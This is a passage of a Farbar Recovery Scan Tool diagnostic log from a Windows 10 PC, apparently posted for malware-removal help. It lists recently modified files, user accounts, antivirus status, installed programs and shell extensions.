2021-01-03 08:36 - 2021-01-16 10:02 - 000000000 ____D C:\Users\IRENA-PC\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Exodus Movement Inc
2021-01-03 08:36 - 2021-01-16 10:02 - 000000000 ____D C:\Users\IRENA-PC\AppData\Local\exodus
2020-12-26 19:07 - 2020-12-27 17:58 - 000000000 ___RD C:\Users\IRENA-PC\Dropbox
2020-12-26 18:55 - 2020-12-26 18:55 - 000669800 _____ (Dropbox, Inc.) C:\Users\IRENA-PC\Downloads\DropboxInstaller.exe
2020-12-21 09:07 - 2021-01-09 15:16 - 000002869 _____ C:\Users\IRENA-PC\Desktop\YouTube Music (1).lnk
==================== One month (modified) ==================
(If an entry is included in the fixlist, the file/folder will be moved.)
2021-01-20 07:09 - 2020-06-30 17:37 - 000002296 ____H C:\Users\IRENA-PC\Documents\Default.rdp
2021-01-20 07:08 - 2020-08-19 19:19 - 000003584 _____ C:\WINDOWS\system32\Tasks\MicrosoftEdgeUpdateTaskMachineUA
2021-01-20 07:08 - 2020-08-19 19:19 - 000003460 _____ C:\WINDOWS\system32\Tasks\MicrosoftEdgeUpdateTaskMachineCore
2021-01-20 07:08 - 2020-08-19 19:06 - 000000000 ____D C:\WINDOWS\system32\SleepStudy
2021-01-20 07:08 - 2017-01-30 08:45 - 000000000 ____D C:\Users\IRENA-PC\AppData\LocalLow\Mozilla
2021-01-19 21:49 - 2019-12-07 10:14 - 000000000 ____D C:\ProgramData\regid.1991-06.com.microsoft
2021-01-19 19:22 - 2019-02-05 07:34 - 000000000 ____D C:\ProgramData\Mozilla
2021-01-19 14:44 - 2019-12-07 10:14 - 000000000 ___HD C:\Program Files\WindowsApps
2021-01-19 14:44 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\AppReadiness
2021-01-18 17:25 - 2018-06-14 10:05 - 000000000 ____D C:\Users\IRENA-PC\AppData\Local\JDownloader 2.0
2021-01-17 13:54 - 2017-07-05 17:16 - 000000000 ____D C:\Users\IRENA-PC\AppData\Roaming\vlc
2021-01-15 19:23 - 2019-12-07 10:13 - 000000000 ____D C:\WINDOWS\INF
2021-01-15 07:42 - 2020-09-06 10:11 - 000000000 ____D C:\Users\IRENA-PC\AppData\Local\PrivaZer
2021-01-15 07:06 - 2019-12-07 10:14 - 000000000 ___HD C:\WINDOWS\ELAMBKUP
2021-01-14 07:16 - 2020-08-19 19:15 - 001693136 _____ C:\WINDOWS\system32\PerfStringBackup.INI
2021-01-14 07:16 - 2019-12-07 15:43 - 000716742 _____ C:\WINDOWS\system32\perfh005.dat
2021-01-14 07:16 - 2019-12-07 15:43 - 000144920 _____ C:\WINDOWS\system32\perfc005.dat
2021-01-14 07:11 - 2020-08-19 19:19 - 000000006 ____H C:\WINDOWS\Tasks\SA.DAT
2021-01-14 07:11 - 2020-08-19 19:06 - 000008192 ___SH C:\DumpStack.log.tmp
2021-01-14 07:11 - 2019-12-07 10:03 - 000524288 _____ C:\WINDOWS\system32\config\BBI
2021-01-14 07:11 - 2018-12-26 18:07 - 000000000 ____D C:\Program Files (x86)\TeamViewer
2021-01-14 04:09 - 2020-08-19 19:07 - 000000000 ____D C:\Users\IRENA-PC
2021-01-13 22:05 - 2019-12-07 15:47 - 000000000 ____D C:\Program Files\Windows Photo Viewer
2021-01-13 22:05 - 2019-12-07 15:47 - 000000000 ____D C:\Program Files\Windows Defender Advanced Threat Protection
2021-01-13 22:05 - 2019-12-07 15:47 - 000000000 ____D C:\Program Files (x86)\Windows Photo Viewer
2021-01-13 22:05 - 2019-12-07 10:14 - 000000000 ___SD C:\WINDOWS\SysWOW64\F12
2021-01-13 22:05 - 2019-12-07 10:14 - 000000000 ___SD C:\WINDOWS\SysWOW64\DiagSvcs
2021-01-13 22:05 - 2019-12-07 10:14 - 000000000 ___SD C:\WINDOWS\system32\UNP
2021-01-13 22:05 - 2019-12-07 10:14 - 000000000 ___SD C:\WINDOWS\system32\F12
2021-01-13 22:05 - 2019-12-07 10:14 - 000000000 ___SD C:\WINDOWS\system32\DiagSvcs
2021-01-13 22:05 - 2019-12-07 10:14 - 000000000 ___RD C:\WINDOWS\PrintDialog
2021-01-13 22:05 - 2019-12-07 10:14 - 000000000 ___RD C:\WINDOWS\ImmersiveControlPanel
2021-01-13 22:05 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\SysWOW64\setup
2021-01-13 22:05 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\SysWOW64\PerceptionSimulation
2021-01-13 22:05 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\SysWOW64\oobe
2021-01-13 22:05 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\SysWOW64\Dism
2021-01-13 22:05 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\SysWOW64\Com
2021-01-13 22:05 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\SysWOW64\AdvancedInstallers
2021-01-13 22:05 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\SystemResources
2021-01-13 22:05 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\system32\WinBioPlugIns
2021-01-13 22:05 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\system32\SystemResetPlatform
2021-01-13 22:05 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\system32\Sysprep
2021-01-13 22:05 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\system32\setup
2021-01-13 22:05 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\system32\PerceptionSimulation
2021-01-13 22:05 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\system32\oobe
2021-01-13 22:05 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\system32\Dism
2021-01-13 22:05 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\system32\Com
2021-01-13 22:05 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\system32\AdvancedInstallers
2021-01-13 22:05 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\ShellExperiences
2021-01-13 22:05 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\ShellComponents
2021-01-13 22:05 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\Provisioning
2021-01-13 22:05 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\PolicyDefinitions
2021-01-13 22:05 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\IME
2021-01-13 22:05 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\bcastdvr
2021-01-13 22:05 - 2019-12-07 10:14 - 000000000 ____D C:\Program Files\Windows Defender
2021-01-13 21:55 - 2019-12-07 10:03 - 000000000 ____D C:\WINDOWS\CbsTemp
2021-01-13 21:43 - 2020-08-19 19:08 - 002877952 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\PrintConfig.dll
2021-01-13 21:32 - 2017-01-29 22:43 - 000000000 ____D C:\WINDOWS\system32\MRT
2021-01-13 21:28 - 2017-01-29 22:43 - 135062968 ____C (Microsoft Corporation) C:\WINDOWS\system32\MRT.exe
2021-01-13 13:42 - 2019-04-16 19:31 - 000018134 _____ C:\Users\IRENA-PC\Documents\web hlavní stránka.txt
2021-01-11 20:14 - 2018-10-14 17:50 - 000000000 ____D C:\Users\IRENA-PC\AppData\Roaming\avidemux
2021-01-10 14:44 - 2019-03-19 10:59 - 000000000 ____D C:\Users\IRENA-PC\Downloads\Ulozto
2021-01-09 18:46 - 2017-02-16 12:26 - 000000000 ____D C:\Users\IRENA-PC\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Aplikace Chrome
2021-01-09 18:43 - 2017-12-16 15:22 - 000000000 ____D C:\Program Files (x86)\IQ Option
2021-01-09 15:16 - 2020-05-06 13:44 - 000002563 _____ C:\Users\IRENA-PC\Desktop\YouTube Music.lnk
2021-01-09 15:16 - 2020-03-26 15:41 - 000002689 _____ C:\Users\IRENA-PC\Desktop\SS TV Remote.lnk
2021-01-09 08:19 - 2017-11-05 22:29 - 000000000 ____D C:\Users\IRENA-PC\AppData\Local\Packages
2021-01-09 08:06 - 2017-01-30 08:44 - 000000000 ____D C:\Program Files (x86)\Mozilla Maintenance Service
2021-01-09 08:05 - 2017-03-10 18:17 - 000044003 _____ C:\Users\IRENA-PC\Documents\klikačky.txt
2021-01-08 13:28 - 2020-06-04 19:19 - 000002419 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Edge.lnk
2021-01-07 13:56 - 2017-01-30 08:44 - 000001005 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Firefox.lnk
2021-01-07 07:09 - 2020-03-23 13:20 - 000002301 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk
2021-01-07 07:09 - 2020-03-23 13:20 - 000002260 _____ C:\Users\Public\Desktop\Google Chrome.lnk
2021-01-05 10:28 - 2020-07-25 06:20 - 000000000 ____D C:\Users\IRENA-PC\Downloads\Telegram Desktop
2021-01-05 10:17 - 2019-10-29 08:35 - 000000000 ____D C:\Users\IRENA-PC\AppData\Roaming\Telegram Desktop
2021-01-03 17:07 - 2018-02-16 13:35 - 000000000 ____D C:\Users\IRENA-PC\AppData\Roaming\Authy Desktop
2021-01-03 10:57 - 2019-01-02 09:37 - 000000000 ____D C:\Users\IRENA-PC\AppData\Roaming\HandBrake
2021-01-03 08:36 - 2018-02-16 13:35 - 000000000 ____D C:\Users\IRENA-PC\AppData\Local\SquirrelTemp
2020-12-28 18:45 - 2019-07-07 19:03 - 000001086 _____ C:\Users\IRENA-PC\Documents\telenovely.txt
2020-12-23 20:11 - 2017-04-27 15:39 - 000000000 ____D C:\Users\IRENA-PC\AppData\Roaming\Ulozto File Manager
2020-12-22 18:29 - 2020-08-19 19:19 - 000004562 _____ C:\WINDOWS\system32\Tasks\Adobe Acrobat Update Task
2020-12-22 18:28 - 2020-12-15 18:05 - 000002136 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Acrobat Reader DC.lnk
2020-12-22 13:54 - 2019-10-12 11:58 - 000001382 _____ C:\Users\Public\Desktop\Free Netflix Download.lnk
2020-12-22 13:54 - 2019-10-12 11:58 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\FreeGrabApp
2020-12-22 13:54 - 2019-10-12 11:58 - 000000000 ____D C:\Program Files (x86)\FreeGrabApp
==================== Files in the root of some directories ========
2019-01-25 08:47 - 2019-02-04 08:42 - 000012386 _____ () C:\Users\IRENA-PC\AppData\Roaming\downloads.json
==================== SigCheck ============================
(There is no automatic fix for files that do not pass verification.)
==================== End of FRST.txt ========================
2.část
Additional scan result of Farbar Recovery Scan Tool (x64) Version: 19-01-2021
Ran by IRENA-PC (20-01-2021 07:17:24)
Running from C:\Users\IRENA-PC\Desktop
Windows 10 Pro Version 2004 19041.746 (X64) (2020-08-19 18:19:30)
Boot Mode: Normal
==========================================================
==================== Accounts: =============================
Administrator (S-1-5-21-3708313529-2431682257-2596704864-500 - Administrator - Disabled)
DefaultAccount (S-1-5-21-3708313529-2431682257-2596704864-503 - Limited - Disabled)
defaultuser0 (S-1-5-21-3708313529-2431682257-2596704864-1000 - Limited - Disabled)
Guest (S-1-5-21-3708313529-2431682257-2596704864-501 - Limited - Disabled)
IRENA-PC (S-1-5-21-3708313529-2431682257-2596704864-1001 - Administrator - Enabled) => C:\Users\IRENA-PC
WDAGUtilityAccount (S-1-5-21-3708313529-2431682257-2596704864-504 - Limited - Disabled)
==================== Security Center ========================
(If an entry is included in the fixlist, it will be removed.)
AV: Windows Defender (Enabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AV: Malwarebytes (Enabled - Up to date) {23007AD3-69FE-687C-2629-D584AFFAF72B}
AS: Windows Defender (Enabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
==================== Installed Programs ======================
(Only the adware programs with "Hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)
„Microsoft Office Proofing Tools 2016“ – lietuvių k. (HKLM\...\{90160000-001F-0427-1000-0000000FF1CE}) (Version: 16.0.4266.1001 - Microsoft Corporation) Hidden
7-Zip 16.04 (x64) (HKLM\...\7-Zip) (Version: 16.04 - Igor Pavlov)
Adobe Acrobat Reader DC - Czech (HKLM-x32\...\{AC76BA86-7AD7-1029-7B44-AC0F074E4100}) (Version: 20.013.20074 - Adobe Systems Incorporated)
Adobe Photoshop CC 2019 (HKLM-x32\...\PHSP_20_0_4) (Version: 20.0.4 - Adobe Systems Incorporated)
Aimersoft Helper Compact 2.5.2 (HKLM-x32\...\{405147F7-FCC5-499B-A27E-EA6BD4A80435}_is1) (Version: 2.5.2 - Aimersoft)
Alati za jezičnu provjeru u sustavu Microsoft Office 2016 - hrvatski (HKLM\...\{90160000-001F-041A-1000-0000000FF1CE}) (Version: 16.0.4266.1001 - Microsoft Corporation) Hidden
Authy Desktop (HKU\S-1-5-21-3708313529-2431682257-2596704864-1001\...\authy) (Version: 1.8.3 - Twilio Inc.)
Avidemux 2.7 - 64 bits (HKLM-x32\...\Avidemux 2.7 - 64 bits (64-bit)) (Version: 2.7.1.180604 - )
Avidemux VC++ 64bits (HKU\S-1-5-21-3708313529-2431682257-2596704864-1001\...\{3598910c-c7d9-450b-bfde-5a8d49dabd30}) (Version: 2.7.3 - Mean)
Avidemux VC++ 64bits (HKU\S-1-5-21-3708313529-2431682257-2596704864-1001\...\{8cbf4d89-2ce8-4178-8bb4-1600f5e69e65}) (Version: 2.7.3 - Mean)
Avidemux VC++ 64bits (HKU\S-1-5-21-3708313529-2431682257-2596704864-1001\...\{b859fd90-1d56-4013-8e47-a727a65ae7a3}) (Version: 2.7.3 - Mean)
Avidemux VC++ 64bits (HKU\S-1-5-21-3708313529-2431682257-2596704864-1001\...\{c28b1ebe-2fed-4e19-a347-e0629e5cf6f5}) (Version: 2.7.2 - Mean)
Bighits4U Viewer 3.6 (HKLM-x32\...\{ACC1EF6D-F9C2-4B5E-BA01-25F3F9E57B68}) (Version: 3.6.0 - BigHits4U) Hidden
Bighits4U Viewer 3.6 (HKU\S-1-5-21-3708313529-2431682257-2596704864-1001\...\Bighits4U Viewer 3.6 3.6.0) (Version: 3.6.0 - BigHits4U)
Công cụ Soát lỗi Microsoft Office 2016 - Tiếng Việt (HKLM\...\{90160000-001F-042A-1000-0000000FF1CE}) (Version: 16.0.4266.1001 - Microsoft Corporation) Hidden
Eines de correcció del Microsoft Office 2016: català (HKLM\...\{90160000-001F-0403-1000-0000000FF1CE}) (Version: 16.0.4266.1001 - Microsoft Corporation) Hidden
Exodus (HKU\S-1-5-21-3708313529-2431682257-2596704864-1001\...\exodus) (Version: 21.1.15 - Exodus Movement Inc)
Ferramentas de Verificação do Microsoft Office 2016 - Português (HKLM\...\{90160000-001F-0816-1000-0000000FF1CE}) (Version: 16.0.4266.1001 - Microsoft Corporation) Hidden
Ferramentas de verificación de Microsoft Office 2016 - Galego (HKLM\...\{90160000-001F-0456-1000-0000000FF1CE}) (Version: 16.0.4266.1001 - Microsoft Corporation) Hidden
Free MP3 Cutter 1.01 (HKLM-x32\...\{847E0734-4457-4B48-BF49-998D1CF2CFA1}_is1) (Version: - PolySoft Solutions)
Free Netflix Download version 5.0.16.1204 (HKLM-x32\...\Free Netflix Download_is1) (Version: 5.0.16.1204 - FreeGrabApp Ltd)
GhostMouse (HKLM-x32\...\GhostMouse_is1) (Version: Free V3.2.3 - ghost-mouse.com)
Google Chrome (HKLM-x32\...\Google Chrome) (Version: 87.0.4280.141 - Google LLC)
Google Update Helper (HKLM-x32\...\{60EC980A-BDA2-4CB6-A427-B07A5498B4CA}) (Version: 1.3.36.51 - Google LLC) Hidden
Greenshot 1.2.9.129 (HKLM\...\Greenshot_is1) (Version: 1.2.9.129 - Greenshot)
HandBrake 1.2.2 (HKLM-x32\...\HandBrake) (Version: 1.2.2 - )
Herramientas de corrección de Microsoft Office 2016: español (HKLM\...\{90160000-001F-0C0A-1000-0000000FF1CE}) (Version: 16.0.4266.1001 - Microsoft Corporation) Hidden
I-Microsoft Office Proofing Tools 2016 - IsiZulu (HKLM\...\{90160000-001F-0435-1000-0000000FF1CE}) (Version: 16.0.4266.1001 - Microsoft Corporation) Hidden
Innealan-dearbhaidh Microsoft Office 2016 - Gàidhlig (HKLM\...\{90160000-001F-0491-1000-0000000FF1CE}) (Version: 16.0.4266.1001 - Microsoft Corporation) Hidden
Instrumente de verificare Microsoft Office 2016 - Română (HKLM\...\{90160000-001F-0418-1000-0000000FF1CE}) (Version: 16.0.4266.1001 - Microsoft Corporation) Hidden
Java 8 Update 271 (HKLM-x32\...\{26A24AE4-039D-4CA4-87B4-2F32180271F0}) (Version: 8.0.2710.9 - Oracle Corporation)
JDownloader 2 (HKLM\...\jdownloader2) (Version: 2.0 - AppWork GmbH)
Korrekturredskaber til Microsoft Office 2016 - Dansk (HKLM\...\{90160000-001F-0406-1000-0000000FF1CE}) (Version: 16.0.4266.1001 - Microsoft Corporation) Hidden
Korrekturverktøy for Microsoft Office 2016 – norsk (bokmål) (HKLM\...\{90160000-001F-0414-1000-0000000FF1CE}) (Version: 16.0.4266.1001 - Microsoft Corporation) Hidden
Korrekturverktøy for Microsoft Office 2016 – norsk (nynorsk) (HKLM\...\{90160000-001F-0814-1000-0000000FF1CE}) (Version: 16.0.4266.1001 - Microsoft Corporation) Hidden
MediaInfo 18.05 (HKLM\...\MediaInfo) (Version: 18.05 - MediaArea.net)
Microsoft Edge (HKLM-x32\...\Microsoft Edge) (Version: 87.0.664.75 - Microsoft Corporation)
Microsoft Edge Update (HKLM-x32\...\Microsoft Edge Update) (Version: 1.3.139.71 - )
Microsoft Office Professional Plus 2016 (HKLM\...\Office16.PROPLUS) (Version: 16.0.4266.1001 - Microsoft Corporation)
Microsoft Office Proofing Tools Kit Compilation 2016 (HKLM\...\Office16.PROOFKIT) (Version: 16.0.4266.1001 - Microsoft Corporation)
Microsoft OneDrive (HKU\S-1-5-21-3708313529-2431682257-2596704864-1001\...\OneDriveSetup.exe) (Version: 20.201.1005.0009 - Microsoft Corporation)
Microsoft Project Professional 2016 (HKLM\...\Office16.PRJPRO) (Version: 16.0.4266.1001 - Microsoft Corporation)
Microsoft Visio Professional 2016 (HKLM\...\Office16.VISPRO) (Version: 16.0.4266.1001 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{7299052b-02a4-4627-81f2-1818da5d550d}) (Version: 8.0.56336 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{071c9b48-7c32-4621-a0ac-3f809523288f}) (Version: 8.0.56336 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.17 (HKLM\...\{8220EEFE-38CD-377E-8595-13398D740ACE}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM-x32\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2010 x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2010 x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 (HKLM-x32\...\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 (HKLM-x32\...\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.21005 (HKLM-x32\...\{7f51bdb9-ee21-49ee-94d6-90afc321780e}) (Version: 12.0.21005.1 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 (HKLM-x32\...\{050d4fc8-5d48-4b8f-8972-47c82c46020f}) (Version: 12.0.30501.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.40660 (HKLM-x32\...\{ef6b00ec-13e1-4c25-9064-b2f383cb8412}) (Version: 12.0.40660.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.21005 (HKLM-x32\...\{ce085a78-074e-4823-8dc1-8a721b94b76d}) (Version: 12.0.21005.1 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 (HKLM-x32\...\{f65db027-aff3-4070-886a-0d87064aabb1}) (Version: 12.0.30501.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.40660 (HKLM-x32\...\{61087a79-ac85-455c-934d-1fa22cc64f36}) (Version: 12.0.40660.0 - Microsoft Corporation)
Microsoft Visual C++ 2017 Redistributable (x64) - 14.15.26706 (HKLM-x32\...\{95ac1cfa-f4fb-4d1b-8912-7f9d5fbb140d}) (Version: 14.15.26706.0 - Microsoft Corporation)
Microsoft Visual C++ 2017 Redistributable (x86) - 14.15.26706 (HKLM-x32\...\{7e9fae12-5bbf-47fb-b944-09c49e75c061}) (Version: 14.15.26706.0 - Microsoft Corporation)
Mozilla Firefox 84.0.2 (x64 cs) (HKLM\...\Mozilla Firefox 84.0.2 (x64 cs)) (Version: 84.0.2 - Mozilla)
Mozilla Maintenance Service (HKLM\...\MozillaMaintenanceService) (Version: 55.0.1 - Mozilla)
Mp3tag v2.97 (HKLM-x32\...\Mp3tag) (Version: 2.97 - Florian Heidenreich)
Narzędzia sprawdzające pakietu Microsoft Office 2016 — polski (HKLM\...\{90160000-001F-0415-1000-0000000FF1CE}) (Version: 16.0.4266.1001 - Microsoft Corporation) Hidden
Nástroje kontroly pravopisu pro Microsoft Office 2016 – čeština (HKLM\...\{90160000-001F-0405-1000-0000000FF1CE}) (Version: 16.0.4266.1001 - Microsoft Corporation) Hidden
Nástroje korektúry balíka Microsoft Office 2016 - slovenčina (HKLM\...\{90160000-001F-041B-1000-0000000FF1CE}) (Version: 16.0.4266.1001 - Microsoft Corporation) Hidden
Orodja za preverjanje za Microsoft Office 2016 – angleščina (HKLM\...\{90160000-001F-0424-1000-0000000FF1CE}) (Version: 16.0.4266.1001 - Microsoft Corporation) Hidden
Outils de vérification linguistique 2016 de Microsoft Office - Français (HKLM\...\{90160000-001F-040C-1000-0000000FF1CE}) (Version: 16.0.4266.1001 - Microsoft Corporation) Hidden
PrivaZer (HKLM-x32\...\PrivaZer) (Version: 4.0.17.0 - Goversoft LLC)
Rainmeter (HKLM-x32\...\Rainmeter) (Version: 4.3.1 r3321 - Rainmeter)
Revisores de Texto do Microsoft Office 2016 – Português (Brasil) (HKLM\...\{90160000-001F-0416-1000-0000000FF1CE}) (Version: 16.0.4266.1001 - Microsoft Corporation) Hidden
RoboForex - MetaTrader 4 (HKLM-x32\...\RoboForex - MetaTrader 4) (Version: 4.00 - MetaQuotes Software Corp.)
Strumenti di correzione di Microsoft Office 2016 - Italiano (HKLM\...\{90160000-001F-0410-1000-0000000FF1CE}) (Version: 16.0.4266.1001 - Microsoft Corporation) Hidden
Subtitle Edit 3.5.18 (HKLM\...\SubtitleEdit_is1) (Version: 3.5.18.1 - Nikse)
SUPERAntiSpyware (HKLM\...\{CDDCBBF1-2703-46BC-938B-BCC81A1EEAAA}) (Version: 6.0.1254 - SUPERAntiSpyware.com)
Taalprogramma's voor Microsoft Office 2016 - Nederlands (HKLM\...\{90160000-001F-0413-1000-0000000FF1CE}) (Version: 16.0.4266.1001 - Microsoft Corporation) Hidden
TeamViewer (HKLM-x32\...\TeamViewer) (Version: 15.2.2756 - TeamViewer)
Telegram Desktop version 2.5.1 (HKU\S-1-5-21-3708313529-2431682257-2596704864-1001\...\{53F49750-6209-4FBF-9CA8-7A333C87D1ED}_is1) (Version: 2.5.1 - Telegram FZ-LLC)
Total Commander 64+32-bit (Remove or Repair) (HKLM\...\Totalcmd64) (Version: 9.21a - Ghisler Software GmbH)
Tweetz Desktop verze 0.11.0 (HKLM-x32\...\{FE1B7E2D-6E96-4D39-B39F-62CA62D11A79}_is1) (Version: 0.11.0 - Mike Ward)
Uirlisí Profála Microsoft Office 2016 - Gaeilge (HKLM\...\{90160000-001F-083C-1000-0000000FF1CE}) (Version: 16.0.4266.1001 - Microsoft Corporation) Hidden
Ulož.to FileManager 2.82 (64-bit) (HKLM\...\3f2e2cd28b0e4e4396c2402fbc85a0f0_is1) (Version: 2.82 - Uloz.to cloud a.s.)
Update for Windows 10 for x64-based Systems (KB4023057) (HKLM\...\{F814D094-197F-43C8-87FA-3210BB780486}) (Version: 2.53.0.0 - Microsoft Corporation)
Veglat e kontrollit gjuhësor të Microsoft Office 2016 - shqip (HKLM\...\{90160000-001F-041C-1000-0000000FF1CE}) (Version: 16.0.4266.1001 - Microsoft Corporation) Hidden
VLC media player (HKLM\...\VLC media player) (Version: 3.0.8 - VideoLAN)
Web Launch Recorder (HKU\S-1-5-21-3708313529-2431682257-2596704864-1001\...\WebLaunchRecorder) (Version: 2.0 - )
Εργαλεία γλωσσικού ελέγχου του Microsoft Office 2016 - Ελληνικά (HKLM\...\{90160000-001F-0408-1000-0000000FF1CE}) (Version: 16.0.4266.1001 - Microsoft Corporation) Hidden
Засоби перевірки правопису Microsoft Office 2016 – українська (HKLM\...\{90160000-001F-0422-1000-0000000FF1CE}) (Version: 16.0.4266.1001 - Microsoft Corporation) Hidden
Средства проверки правописания Microsoft Office 2016 — русский (HKLM\...\{90160000-001F-0419-1000-0000000FF1CE}) (Version: 16.0.4266.1001 - Microsoft Corporation) Hidden
כלי ההגהה של Microsoft Office 2016 - עברית (HKLM\...\{90160000-001F-040D-1000-0000000FF1CE}) (Version: 16.0.4266.1001 - Microsoft Corporation) Hidden
ابزارهای تصحیح Microsoft Office 2016 - فارسی (HKLM\...\{90160000-001F-0429-1000-0000000FF1CE}) (Version: 16.0.4266.1001 - Microsoft Corporation) Hidden
Packages:
=========
Deezer Music -> C:\Program Files\WindowsApps\Deezer.62021768415AF_4.32.0.0_x86__q7m17pa7q8kj0 [2021-01-19] (Deezer SA)
Easy WOL (Wake on LAN) -> C:\Program Files\WindowsApps\1460ArunasAdomaitis.EasyWOLWakeonLAN_1.1.1.0_x64__fzh5k4x0zh00p [2019-05-21] (Arunas Adomaitis)
Facebook -> C:\Program Files\WindowsApps\Facebook.Facebook_186.2619.19263.0_x86__8xx8rvfyw5nnt [2019-10-10] (Facebook Inc)
Microsoft Advertising SDK for XAML -> C:\Program Files\WindowsApps\Microsoft.Advertising.Xaml_10.1811.1.0_x64__8wekyb3d8bbwe [2019-02-03] (Microsoft Corporation) [MS Ad]
Microsoft Advertising SDK for XAML -> C:\Program Files\WindowsApps\Microsoft.Advertising.Xaml_10.1811.1.0_x86__8wekyb3d8bbwe [2019-02-03] (Microsoft Corporation) [MS Ad]
Microsoft Solitaire Collection -> C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_4.9.1102.0_x64__8wekyb3d8bbwe [2021-01-13] (Microsoft Studios) [MS Ad]
Microsoft To Do -> C:\Program Files\WindowsApps\Microsoft.Todos_2.36.4182.0_x64__8wekyb3d8bbwe [2021-01-19] (Microsoft Corporation) [Startup Task]
Minecraft for Windows 10 -> C:\Program Files\WindowsApps\Microsoft.MinecraftUWP_1.16.20102.0_x64__8wekyb3d8bbwe [2020-12-16] (Microsoft Studios)
Samsung Printer Experience -> C:\Program Files\WindowsApps\SAMSUNGELECTRONICSCO.LTD.SamsungPrinterExperience_1.3.15.0_x64__3c1yjt4zspk6g [2017-02-03] (Samsung Electronics Co. Ltd.)
Twitter -> C:\Program Files\WindowsApps\9E2F88E3.Twitter_6.1.4.1000_neutral__wgeqdkkx372wm [2018-09-08] (Twitter Inc.)
==================== Custom CLSID (Whitelisted): ==============
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
ShellIconOverlayIdentifiers: [ MEGA (Pending)] -> {056D528D-CE28-4194-9BA3-BA2E9197FF8C} => -> No File
ShellIconOverlayIdentifiers: [ MEGA (Synced)] -> {05B38830-F4E9-4329-978B-1DD28605D202} => -> No File
ShellIconOverlayIdentifiers: [ MEGA (Syncing)] -> {0596C850-7BDD-4C9D-AFDF-873BE6890637} => -> No File
ShellIconOverlayIdentifiers: [00asw] -> {472083B0-C522-11CF-8763-00608CC02F24} => -> No File
ShellIconOverlayIdentifiers-x32: [ MEGA (Pending)] -> {056D528D-CE28-4194-9BA3-BA2E9197FF8C} => -> No File
ShellIconOverlayIdentifiers-x32: [ MEGA (Synced)] -> {05B38830-F4E9-4329-978B-1DD28605D202} => -> No File
ShellIconOverlayIdentifiers-x32: [ MEGA (Syncing)] -> {0596C850-7BDD-4C9D-AFDF-873BE6890637} => -> No File
ContextMenuHandlers1: [7-Zip] -> {23170F69-40C1-278A-1000-000100020000} => C:\Program Files\7-Zip\7-zip.dll [2016-10-04] (Igor Pavlov) [File not signed]
ContextMenuHandlers1: [MEGA (Context menu)] -> {0229E5E7-09E9-45CF-9228-0228EC7D5F17} => -> No File
ContextMenuHandlers1: [Mp3tagShell] -> {6351E20C-35FA-4BE3-98FB-4CABF1363E12} => C:\Program Files (x86)\Mp3tag\Mp3tagShell64.dll [2019-02-28] (Florian Heidenreich) [File not signed]
